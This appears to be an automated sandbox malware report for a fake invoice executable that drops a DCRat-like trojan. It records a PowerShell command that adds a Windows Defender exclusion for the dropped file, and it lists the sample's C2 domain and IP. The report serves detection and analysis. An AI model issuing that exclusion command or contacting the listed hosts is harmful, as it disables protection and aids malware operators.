Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Dec. 20, 2021, 2:59 p.m.	Dec. 20, 2021, 3:01 p.m.

Size	15.8MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`28513ec46760b0cc74c0aafe4a9e5a83`
SHA256	`2443683c507125b6d089b3537e9cb78ef67f0dd8ba5822a7a7ee78ca84feeba8`
CRC32	`EA67568E`
ssdeep	`393216:JHPIJ9U00691B6yGlJKltydWL5/n64NG6I3kt:NIJ9UO1YZqFrjt`
PDB Path	D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
Yara	PE_Header_Zero - PE File Signature OS_Processor_Check_Zero - OS Processor Check Win32_WinRAR_SFX_Zero - Win32 WinRAR SFX IsPE32 - (no description) Malicious_Library_Zero - Malicious_Library UPX_Zero - UPX packed file

INVOICE_64645686826464874949653635373637363736276363726376.pdf.exe "C:\Users\test22\AppData\Local\Temp\INVOICE_64645686826464874949653635373637363736276363726376.pdf.exe"
2820
- 123.exe "C:\Users\test22\AppData\Local\Temp\123.exe"
  2936
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\123.exe" -Force
    2120
  - 039316b4-c027-429a-95a4-9762f98f495a.exe "C:\Users\test22\AppData\Local\Temp\64fa8e26-afcb-4883-8b36-883ae60b673d\039316b4-c027-429a-95a4-9762f98f495a.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\123.exe" /WindowState ""1"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    2184
- installerpdf.exe "C:\Users\test22\AppData\Local\Temp\installerpdf.exe"
  2988
  - installerpdf.tmp "C:\Users\test22\AppData\Local\Temp\is-J90CH.tmp\installerpdf.tmp" /SL5="$C0138,15152123,861696,C:\Users\test22\AppData\Local\Temp\installerpdf.exe"
    3048
    - SlimPDFReader.exe "C:\Program Files (x86)\Investintech.com Inc\Slim PDF Reader 2.0\SlimPDFReader.exe"
      2544
      - splwow64.exe C:\Windows\splwow64.exe 12288
        2824
    - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
      2840
      - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2840 CREDAT:145409
        2152
explorer.exe C:\Windows\Explorer.EXE
1156

Name	Response	Post-Analysis Lookup
woocommerce.paythrow.com	A 184.168.102.118	184.168.102.118
www.investintech.com	A 165.227.248.55	165.227.248.55

IP Address	Status	Action
117.18.232.200	Active	Moloch
164.124.101.2	Active	Moloch
165.227.248.55	Active	Moloch
184.168.102.118	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49200 -> 165.227.248.55:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49202 -> 165.227.248.55:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49199 -> 165.227.248.55:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49174 -> 184.168.102.118:80	2033087	ET MALWARE Win32/DCRat CnC Exfil	A Network Trojan was detected
TCP 192.168.56.101:49201 -> 165.227.248.55:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 165.227.248.55:443 -> 192.168.56.101:49203	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.101:49204 -> 165.227.248.55:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.101:49215 165.227.248.55:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA	unknown=Private Organization, unknown=CA, serialNumber=379790-2, C=CA, ST=Ontario, L=Toronto, O=Investintech.com Inc., CN=investintech.com	9a:61:a4:27:7f:80:2b:07:87:9c:7f:39:c0:d0:d5:d3:e1:2f:bd:40
TLS 1.2 192.168.56.101:49214 165.227.248.55:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA	unknown=Private Organization, unknown=CA, serialNumber=379790-2, C=CA, ST=Ontario, L=Toronto, O=Investintech.com Inc., CN=investintech.com	9a:61:a4:27:7f:80:2b:07:87:9c:7f:39:c0:d0:d5:d3:e1:2f:bd:40

Queries for the computername (11 events)

Time & API	Arguments	Status	Return
GetComputerNameW Dec. 20, 2021, 2:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 20, 2021, 2:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 20, 2021, 2:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 20, 2021, 2:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 20, 2021, 2:52 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 20, 2021, 2:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 20, 2021, 2:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 20, 2021, 2:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 20, 2021, 2:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Dec. 20, 2021, 2:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 20, 2021, 2:59 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (4 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Dec. 20, 2021, 2:59 p.m.			0	0
IsDebuggerPresent Dec. 20, 2021, 2:59 p.m.			0	0
IsDebuggerPresent Dec. 20, 2021, 2:59 p.m.			0	0
IsDebuggerPresent Dec. 20, 2021, 2:59 p.m.			0	0

Command line console output was observed (9 events)

Time & API	Arguments	Status	Return
WriteConsoleW Dec. 20, 2021, 2:59 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW Dec. 20, 2021, 2:59 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW Dec. 20, 2021, 2:59 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Dec. 20, 2021, 2:59 p.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW Dec. 20, 2021, 2:59 p.m.	buffer: + Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Local\Temp\123. console_handle: 0x00000053	1	1
WriteConsoleW Dec. 20, 2021, 2:59 p.m.	buffer: exe -Force console_handle: 0x0000005f	1	1
WriteConsoleW Dec. 20, 2021, 2:59 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000006b	1	1
WriteConsoleW Dec. 20, 2021, 2:59 p.m.	buffer: mmandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Dec. 20, 2021, 2:59 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000083	1	1

Uses Windows APIs to generate a cryptographic key (49 events)

Time & API	Arguments	Status	Return
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ab3f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ab4f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ab4f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b3968 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b3ee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b3ee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b3ee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b40e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b40e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b40e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b40e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b40e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b40e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b3928 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b3928 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b3928 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b3ee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b3ee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b3ee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b3528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b3ee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b3ee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b3ee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b3ee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b3ee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b3ee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b3ee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b41a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b41a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b41a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b41a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b41a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b41a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b41a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2021, 2:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b41a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

This executable has a PDB path (1 event)

pdb_path

D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Dec. 20, 2021, 2:59 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.didat

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

PNG

One or more processes crashed (2 events)

Time & API	Arguments	Status	Return	Repeated
__exception__ Dec. 20, 2021, 3:01 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x76af374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x76844387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x76aeef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x76ae6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x76ae6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x76ae6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x76b05c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x76b806b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x7691d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x7691d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x7691ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x76838a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x76838938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x7683950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x7691dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x7691db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x7691e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x76839367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x76839326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x76be62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x76be6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x76be77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x76be788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x767fa48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x767f853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x767fa4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x7680cd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x7680d87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x760cb727 registers.esp: 113504196 registers.edi: 96664716 registers.eax: 113504196 registers.ebp: 113504276 registers.edx: 100 registers.ebx: 113504560 registers.esi: 2147746133 registers.ecx: 96398568	1	0	0
__exception__ Dec. 20, 2021, 3:01 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x76af374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x7691f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x76b0414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x767efe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x7691a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x752de99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x752b72ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752aab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752aea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752a87f7 CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752aba32 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x76be62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x76be6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x76be77c4 DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x76be7bca CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x752d516f CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x752d50ce RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752aa0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752a9b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752a9aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x752d530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x752d57a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x6c40540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x6c4052ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x6c4e0ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x776a7e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x776854f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x760cb727 registers.esp: 79158216 registers.edi: 1988295184 registers.eax: 79158216 registers.ebp: 79158296 registers.edx: 1 registers.ebx: 6246028 registers.esi: 2147746133 registers.ecx: 3931816420	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Dec. 20, 2021, 3:01 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x76af374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x76844387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x76aeef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x76ae6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x76ae6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x76ae6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x76b05c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x76b806b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x7691d7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x7691d876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x7691ddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x76838a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x76838938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x7683950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x7691dccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x7691db41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x7691e1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x76839367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x76839326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x76be62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x76be6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x76be77c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x76be788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x767fa48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x767f853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x767fa4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x7680cd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x7680d87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x760cb727
registers.esp: 113504196
registers.edi: 96664716
registers.eax: 113504196
registers.ebp: 113504276
registers.edx: 100
registers.ebx: 113504560
registers.esi: 2147746133
registers.ecx: 96398568

__exception__

Dec. 20, 2021, 3:01 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x76af374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x7691f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x76b0414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x767efe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x7691a338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x752de99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x752b72ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752aab0d
